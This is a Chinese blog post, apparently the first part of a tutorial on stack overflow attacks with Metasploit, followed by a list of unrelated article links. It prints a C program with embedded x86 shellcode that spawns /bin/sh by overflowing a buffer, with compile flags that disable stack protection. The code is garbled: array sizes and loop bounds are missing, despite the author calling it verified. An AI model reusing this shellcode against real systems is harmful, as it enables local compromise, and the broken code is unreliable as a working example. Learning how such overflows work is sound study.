使用metasploit进行栈溢出攻击-1
2024-10-20 08:52:35
攻击是在bt5下面进行,目标程序是在ubuntu虚拟机上运行。
首先,需要搞明白什么是栈溢出攻击,详细内容请阅读
http://blog.csdn.net/cnctloveyu/article/details/4236212
这篇文章讲的很清楚了,只是具体例子不是很准确,有点小错误。
下面贴上一个我验证过的,修改过可执行的例子。
//shell.c
#include<unistd.h> char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[]; void main() {
char buffer[];
int i;
long *long_ptr = (long *) large_string; for (i = ; i < ; i++)
*(long_ptr + i) = (int) buffer; for (i = ; i < strlen(shellcode); i++)
large_string[i] = shellcode[i]; strcpy(buffer,large_string);
}
此程序使用gcc -fno-stack-protector -z execstack -g -o shell shell.c 编译
程序执行完毕以后应该新打开一个shell。
最新文章
- 到处都是坑的微信支付V3
- 修改AspNetPager的CustomInfoHTML,添加自定义样式
- Hihocoder 1079 离散化
- 总结jQuery选择器
- css背景图片,bootstrap和jquery-ui结合使用,dialog案例
- 【Machine Learning】wekaの特征选择简介
- 错误:StrictMode $ AndroidBlockGuardPolicy.onNetwork
- hdu3007Buried memory(最小圆覆盖)
- cordova /phonegap 自定义插件
- 自定义UICollectionViewLayout并添加UIDynamic - scorpiozj(转)
- 认识mongoDB数据库
- Excel—图表函数
- CodeForces - 1040B Shashlik Cooking(水题)
- angular1中ng-repeat效率优化方法:
- 剑指offer 05:用两个栈实现队列
- TZOJ:最大连续子序列
- windows 如何不显示带点的文件名、文件夹?
- 3.HTML+CSS 制作个太阳
- 20145105 《Java程序设计》第7周学习总结
- v-model双向数据绑定